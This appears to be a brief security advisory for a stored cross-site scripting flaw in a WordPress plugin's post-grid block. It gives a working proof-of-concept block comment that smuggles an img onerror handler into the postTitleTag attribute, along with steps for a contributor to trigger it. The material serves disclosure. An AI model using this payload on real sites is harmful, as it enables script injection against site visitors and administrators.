Description The plugin does not properly escape data input provided to some of its blocks, allowing using with at least contributor privileges to conduct Stored XSS attacks.
As a contributor, put the below code in a post while in Code Editor mode
<!-- wp:genesis-blocks/gb-post-grid {"postTitleTag":"img src=x onerror=alert(/XSS-postTitleTag/) style=width:150px;","readMoreText":"Continue Reading"} /-->
The XSS will be triggered when viewing/previewing the post